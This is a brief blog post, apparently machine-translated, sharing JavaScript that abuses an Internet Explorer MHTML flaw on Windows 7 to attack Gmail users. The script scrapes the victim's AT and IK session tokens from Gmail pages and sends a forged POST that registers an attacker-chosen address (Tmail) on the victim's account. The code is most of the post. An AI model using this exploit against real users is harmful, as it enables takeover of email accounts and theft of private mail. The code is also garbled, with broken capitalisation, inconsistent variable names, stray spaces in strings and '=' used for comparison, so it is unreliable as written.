Code for testing the gmail mhtml vulnerability in WIN7

RAyh4c Black Box
I haven't updated my blog for a long time. I flipped through a piece of code to test the gmail mhtml vulnerability in WIN7. I don't know where to lose the full version I wrote --!

The MHTML vulnerability initiates an AJAX request in WIN7. Unlike XP, the request can be sent directly to the HTTP protocol. The requested URL must also be in the MHTML protocol. Otherwise, the request has no permission, why does the same-origin policy seem stricter than XP in WIN7? I don't know if someone noticed this detail.

To test the CSRF permission of GMAIL, you must obtain the AT and IK parameters to succeed. Of course, there are many methods to obtain these two parameters, you can retrieve from the COOKIE or directly from the page. The following code is obtained directly from the page.

XmlHttp = new ActiveXObject ("Microsoft. xmlHttp ");
XmlHttp. open ("GET", "mhtml: https://mail.google.com/mail/h/0/", true );
XmlHttp. send ();

XmlHttp. onreadystatechange = function (){
If (xmlHttp. readyState = 4 ){
If (xmlHttp. status = 200 ){
REX =/href = ".*? At = (. {34}) ">/. exec (xmlHttp. responseText );
AThash = RegExp. $1;
XmlHttp. open ("GET", "mhtml: https://mail.google.com/mail/", true );
XmlHttp. send ();
XmlHttp. onreadystatechange = function (){
If (xmlHttp. readyState = 4 ){
If (xmlHttp. status = 200 ){
REX =/GLOBALS = [.*?, "(. {10})",/. exec (xmlHttp. responseText );
IKhash = RegExp. $1;
XmlHttp. open ("POST", "mhtml: https://mail.google.com/mail? Ui = 2 "+" & ik = "+ IKhash +" & view = mdlg & at = "+ AThash, true );
XmlHttp. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded ");
XmlHttp. send ("mdrp = 1 & mda = % 0D % 0A" + Tmail + "% 0D % 0A ");
}
}
}
}
}
}
}